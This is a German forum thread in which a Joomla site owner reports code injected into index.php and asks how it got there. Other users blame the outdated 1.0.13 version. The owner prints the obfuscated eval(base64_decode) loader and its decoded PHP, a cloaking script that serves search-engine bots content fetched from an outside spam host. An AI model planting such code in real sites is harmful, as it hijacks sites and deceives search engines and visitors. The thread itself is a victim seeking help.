Thema: Fremder SourceCode nur bei Google und Yahoo sichtbar

Hallo zusammen,

ich habe jetzt einige Foren durchsucht und keine wirkliche Fehlerursache bzw Sicherheitsleck mit dieser Wirkung gefunden.

Und zwar passiert folgendes:
In der index.php wurde am Ende vor dem schließenden Body-Tag folgender Code (Auszug) eingefügt:
<?eval(base64_decode("WV4cGxvZGUoIjsiLCIzMDsxNzs4N zs5NT...................

Die Dekodierung und Ausgabe der darin enthaltenen evals's ergibt am Ende folgenden ausführbaren Code:


if (stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")||stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")){ $url_unique_name="http://www.getalllinks.info/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]); if (function_exists("curl_init")) { $ch_unique_name = @curl_init(); @curl_setopt ($ch_unique_name, CURLOPT_URL, $url_unique_name); @curl_setopt ($ch_unique_name, CURLOPT_RETURNTRANSFER, 1); @curl_setopt ($ch_unique_name, CURLOPT_TIMEOUT, 30); @curl_setopt ($ch_unique_name, CURLOPT_ENCODING , "gzip"); $result_unique_name=@curl_exec ($ch_unique_name); @curl_close ($ch_unique_name);echo $result_unique_name; } else { $result_unique_name=@file_get_contents($url_unique _name);echo $result_unique_name; } }


Es ist klar was dieser macht. und Google hat auch entsprechend reagiert und die Inhalte der Seite als Cloaking markiert und die Seite vorrübergehend aus dem Index verbannt.
Es wurden auch weitere Dateien mit dem selben Inhalt in den Verzeichnissen angelegt.

Ich brauche jetzt keine Tipps wie 'Version aktualisieren' sondern ich brauche Hinweise auf ein mögliches Leck.

Joomla-Version: 1.13.0 (Aktualisierung im Moment nicht möglich!!!!!)
Doc-Man: 1.4
Joom-Fish: 1.8
JooMap
FacileForms 1.4.7

du hast das leck ja schon selber ausfindig gemacht...

Joomla-Version: 1.13.0 (Aktualisierung im Moment nicht möglich!!!!!)

es gibt ja nicht umsonst sicherheitsupdates auf 1.0.15

weitere sicherheitslücken kann es dennoch geben.
einfach mal deine komponenten überprüfen, ob es neuere versionen gibt (glaube nicht, dass das jetzt jemand für dich macht) und verzeichnisrechte sollten natürlich nicht auf 777 stehen.
backend per htaccess schützen bla bla bla
ich denke das du schon lang genug dabei bist...

Zitat von JoomlaHatesMe

du hast das leck ja schon selber ausfindig gemacht...



es gibt ja nicht umsonst sicherheitsupdates auf 1.0.15

weitere sicherheitslücken kann es dennoch geben.
einfach mal deine komponenten überprüfen, ob es neuere versionen gibt (glaube nicht, dass das jetzt jemand für dich macht) und verzeichnisrechte sollten natürlich nicht auf 777 stehen.
backend per htaccess schützen bla bla bla
ich denke das du schon lang genug dabei bist...

Verzeichnisrechte haben alle 755 bzw 644.
Die grundlegende Absicherung ist auch klar, deswegen habe ich ja das Posting hier eingestellt, weil es eben dennoch aufgetreten ist.


Eine Aktualisierung ist aus diversen Gründen nicht zu realisieren. Was aber ja auch nicht jedesmal die einzige Lösung sein kann.

Zitat von Kubik-Rubik

Um welches Template handelt es sich?

PS: Warum ist eine Aktualisierung auf 1.0.15 momentan nicht möglich?

Das Template ist eine Eigententwicklung.
Ich nutze prinzipiell keine fertigen.

Zitat von Kubik-Rubik

Bleibst du bei der 1.0.x Reihe, dann wird die Aktualisierung auf 1.0.15 wohl die letzte sein!

Ich nehme stark an, dass du aufgrund der alten Version gehackt wurdest, da die 1.0.13 einige große Sicherheitslücken hat -> zum Beispiel: http://forum.joomla.org/viewtopic.php?t=222837

Es kommt nur ein Update in Frage...

Danke dir erstmal für die Info. Der Link ist schon mal hilfreich.
Die Umstände in Punkto Security-Patches sind mir auch bekannt.
Ich arbeite schon seit knapp 4Jahren mit Joomla bzw Mambo und kenne das Problem, der permanenten Updates. Allerdings sind die Updates nicht immer 100% Abwärtskompatibel, was gerade bei Änderungen am Core zur Anpassung an individuelle Funktionen problematisch werden kann. Das is einer der Gründe, weswegen ein kurzfristiges Update nicht machbar ist.

Ich hatte gehofft, dass diese Problem speziell schon bekannt war und es einen reinen Source-Patch gibt oder zumindest eine Info auf spezielle XSS Lecks in Formularen.

Ich verstehe das Posting nicht.
Du weißt das Du eine alte Version einsetzt die Sicherheitslücken enthält die auch aktiv ausgenutzt werden? Nun taucht auf Deiner Seite "mysteriöser" Code auf und Du fragst Dich wie dieser dort hin gekommen ist?

Solange Du nicht sicher ausschließen kannst das über diese Lücken der Code auf die Seite kam hast Du die Antwort auf Deine Frage bereits selber gegeben. Wenn Du eigene Erweiterungen oder Core Hacks am laufen hast und diese zur neuen Version nicht kompatibel sind bleiben Dir meistens diese Möglichkeiten:
- Update der Erweiterungen /Hacks
- Manuelles Patchen der Lücken in der alten Core Version
- "work arround" mittels andere Methoden einen Angriff verhindern (schlechteste Vorgehensweise)

Meistens ist die erste Option der einfachste Weg. Wenn Du beides nicht kannst oder willst dann verzichte auf die Erweiterungen. Eine als unsicher bekannte Seite absichtlich (ob nun aus Faulheit, Bequemlichkeit oder mangels technischer Fähig- oder Möglichkeiten) online zu lassen verdient weder Mitleid noch Bedauern - höchstens eine Anzeige.
Wenn Du das in Kauf nimmst darfst Du Dich aber auch nicht wundern wenn Du solche Probleme bekommst.

PS: "Kurzfristiges Update" Die .15 gibt es nun schon einige Monate. Was verstehst Du dann unter Mittel- oder Langfristig?